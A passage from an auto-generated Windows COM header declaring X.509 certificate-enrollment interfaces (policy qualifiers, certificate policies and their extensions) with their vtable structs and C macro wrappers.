            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt IPolicyQualifier *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IPolicyQualifiersVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IPolicyQualifiers * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IPolicyQualifiers * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IPolicyQualifiers * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IPolicyQualifiers * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IPolicyQualifiers * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IPolicyQualifiers * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IPolicyQualifiers * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in IPolicyQualifiers * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IPolicyQualifier **pVal);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in IPolicyQualifiers * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in IPolicyQualifiers * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in IPolicyQualifiers * This,
            /* [in] */ __RPC__in_opt IPolicyQualifier *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in IPolicyQualifiers * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in IPolicyQualifiers * This);
        
        END_INTERFACE
    } IPolicyQualifiersVtbl;

    interface IPolicyQualifiers
    {
        CONST_VTBL struct IPolicyQualifiersVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IPolicyQualifiers_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IPolicyQualifiers_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IPolicyQualifiers_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IPolicyQualifiers_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IPolicyQualifiers_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IPolicyQualifiers_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IPolicyQualifiers_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IPolicyQualifiers_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define IPolicyQualifiers_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define IPolicyQualifiers_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define IPolicyQualifiers_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define IPolicyQualifiers_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define IPolicyQualifiers_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IPolicyQualifiers_INTERFACE_DEFINED__ */


#ifndef __ICertificatePolicy_INTERFACE_DEFINED__
#define __ICertificatePolicy_INTERFACE_DEFINED__

/* interface ICertificatePolicy */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertificatePolicy;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab31e-217d-11da-b2a4-000e7bbb2b09")
    ICertificatePolicy : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in_opt IObjectId *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ObjectId( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_PolicyQualifiers( 
            /* [retval][out] */ __RPC__deref_out_opt IPolicyQualifiers **ppValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertificatePolicyVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertificatePolicy * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertificatePolicy * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertificatePolicy * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertificatePolicy * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertificatePolicy * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertificatePolicy * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertificatePolicy * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertificatePolicy * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in ICertificatePolicy * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PolicyQualifiers )( 
            __RPC__in ICertificatePolicy * This,
            /* [retval][out] */ __RPC__deref_out_opt IPolicyQualifiers **ppValue);
        
        END_INTERFACE
    } ICertificatePolicyVtbl;

    interface ICertificatePolicy
    {
        CONST_VTBL struct ICertificatePolicyVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertificatePolicy_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertificatePolicy_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertificatePolicy_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertificatePolicy_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertificatePolicy_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertificatePolicy_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertificatePolicy_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertificatePolicy_Initialize(This,pValue)	\
    ( (This)->lpVtbl -> Initialize(This,pValue) ) 

#define ICertificatePolicy_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define ICertificatePolicy_get_PolicyQualifiers(This,ppValue)	\
    ( (This)->lpVtbl -> get_PolicyQualifiers(This,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertificatePolicy_INTERFACE_DEFINED__ */


#ifndef __ICertificatePolicies_INTERFACE_DEFINED__
#define __ICertificatePolicies_INTERFACE_DEFINED__

/* interface ICertificatePolicies */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertificatePolicies;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab31f-217d-11da-b2a4-000e7bbb2b09")
    ICertificatePolicies : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ICertificatePolicy **pVal) = 0;
        
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt ICertificatePolicy *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertificatePoliciesVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertificatePolicies * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertificatePolicies * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertificatePolicies * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertificatePolicies * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertificatePolicies * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertificatePolicies * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertificatePolicies * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in ICertificatePolicies * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ICertificatePolicy **pVal);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in ICertificatePolicies * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in ICertificatePolicies * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in ICertificatePolicies * This,
            /* [in] */ __RPC__in_opt ICertificatePolicy *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in ICertificatePolicies * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in ICertificatePolicies * This);
        
        END_INTERFACE
    } ICertificatePoliciesVtbl;

    interface ICertificatePolicies
    {
        CONST_VTBL struct ICertificatePoliciesVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertificatePolicies_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertificatePolicies_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertificatePolicies_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertificatePolicies_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertificatePolicies_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertificatePolicies_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertificatePolicies_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertificatePolicies_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define ICertificatePolicies_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define ICertificatePolicies_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define ICertificatePolicies_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define ICertificatePolicies_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define ICertificatePolicies_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertificatePolicies_INTERFACE_DEFINED__ */


#ifndef __IX509ExtensionCertificatePolicies_INTERFACE_DEFINED__
#define __IX509ExtensionCertificatePolicies_INTERFACE_DEFINED__

/* interface IX509ExtensionCertificatePolicies */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509ExtensionCertificatePolicies;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab320-217d-11da-b2a4-000e7bbb2b09")
    IX509ExtensionCertificatePolicies : public IX509Extension
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ __RPC__in_opt ICertificatePolicies *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Policies( 
            /* [retval][out] */ __RPC__deref_out_opt ICertificatePolicies **ppValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509ExtensionCertificatePoliciesVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509ExtensionCertificatePolicies * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509ExtensionCertificatePolicies * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509ExtensionCertificatePolicies * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509ExtensionCertificatePolicies * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509ExtensionCertificatePolicies * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509ExtensionCertificatePolicies * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509ExtensionCertificatePolicies * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509ExtensionCertificatePolicies * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509ExtensionCertificatePolicies * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509ExtensionCertificatePolicies * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Critical )( 
            __RPC__in IX509ExtensionCertificatePolicies * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Critical )( 
            __RPC__in IX509ExtensionCertificatePolicies * This,
            /* [in] */ VARIANT_BOOL Value);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509ExtensionCertificatePolicies * This,
            /* [in] */ __RPC__in_opt ICertificatePolicies *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509ExtensionCertificatePolicies * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Policies )( 
            __RPC__in IX509ExtensionCertificatePolicies * This,
            /* [retval][out] */ __RPC__deref_out_opt ICertificatePolicies **ppValue);
        
        END_INTERFACE
    } IX509ExtensionCertificatePoliciesVtbl;

    interface IX509ExtensionCertificatePolicies
    {
        CONST_VTBL struct IX509ExtensionCertificatePoliciesVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509ExtensionCertificatePolicies_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509ExtensionCertificatePolicies_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509ExtensionCertificatePolicies_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509ExtensionCertificatePolicies_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509ExtensionCertificatePolicies_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509ExtensionCertificatePolicies_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509ExtensionCertificatePolicies_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509ExtensionCertificatePolicies_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509ExtensionCertificatePolicies_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509ExtensionCertificatePolicies_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define IX509ExtensionCertificatePolicies_get_Critical(This,pValue)	\
    ( (This)->lpVtbl -> get_Critical(This,pValue) ) 

#define IX509ExtensionCertificatePolicies_put_Critical(This,Value)	\
    ( (This)->lpVtbl -> put_Critical(This,Value) ) 


#define IX509ExtensionCertificatePolicies_InitializeEncode(This,pValue)	\
    ( (This)->lpVtbl -> InitializeEncode(This,pValue) ) 

#define IX509ExtensionCertificatePolicies_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509ExtensionCertificatePolicies_get_Policies(This,ppValue)	\
    ( (This)->lpVtbl -> get_Policies(This,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509ExtensionCertificatePolicies_INTERFACE_DEFINED__ */


#ifndef __IX509ExtensionMSApplicationPolicies_INTERFACE_DEFINED__
#define __IX509ExtensionMSApplicationPolicies_INTERFACE_DEFINED__

/* interface IX509ExtensionMSApplicationPolicies */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509ExtensionMSApplicationPolicies;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab321-217d-11da-b2a4-000e7bbb2b09")
    IX509ExtensionMSApplicationPolicies : public IX509Extension
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ __RPC__in_opt ICertificatePolicies *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Policies( 
            /* [retval][out] */ __RPC__deref_out_opt ICertificatePolicies **ppValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509ExtensionMSApplicationPoliciesVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509ExtensionMSApplicationPolicies * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509ExtensionMSApplicationPolicies * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509ExtensionMSApplicationPolicies * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509ExtensionMSApplicationPolicies * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509ExtensionMSApplicationPolicies * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509ExtensionMSApplicationPolicies * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509ExtensionMSApplicationPolicies * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509ExtensionMSApplicationPolicies * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509ExtensionMSApplicationPolicies * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509ExtensionMSApplicationPolicies * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Critical )( 
            __RPC__in IX509ExtensionMSApplicationPolicies * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Critical )( 
            __RPC__in IX509ExtensionMSApplicationPolicies * This,
            /* [in] */ VARIANT_BOOL Value);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509ExtensionMSApplicationPolicies * This,
            /* [in] */ __RPC__in_opt ICertificatePolicies *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509ExtensionMSApplicationPolicies * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
